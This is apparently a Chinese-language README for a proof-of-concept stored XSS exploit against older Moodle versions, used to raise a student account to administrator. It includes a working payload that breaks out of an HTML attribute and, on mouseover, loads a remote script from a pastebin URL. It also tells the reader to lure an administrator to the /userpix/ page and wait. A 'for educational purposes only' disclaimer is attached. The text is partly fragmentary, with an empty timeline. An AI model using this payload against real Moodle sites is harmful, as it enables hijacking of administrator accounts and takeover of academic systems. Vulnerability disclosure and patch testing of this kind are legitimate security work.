Moodle(低于 3.6.2、3.5.4、3.4.7、3.1.16 版本)的 XSS 利用 PoC,用于权限提升(从学生到管理员)。这是我在过去对某学术机构进行渗透测试时发现的其中一个漏洞。当时仅凭这一个简单的漏洞,就足以成功窃取管理员访问权限并获得对 Moodle 的完全控制。
从 git 历史记录 可以看出,该漏洞自 Moodle 早期版本(2003 年)就已存在,直到 2019 年才被修复。
时间线:
仅供教育目的使用。请勿将此利用用于非法活动。作者不对任何滥用或损害承担责任。
userid 的值替换为你自己的 ID。假设 URL 为 https://pastebin.com/raw/xxxxxxxx。" style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')/userpix/ 页面,或者在你的帖子中放置该页面的链接,然后等待。如果成功,你的账户将被添加为管理员。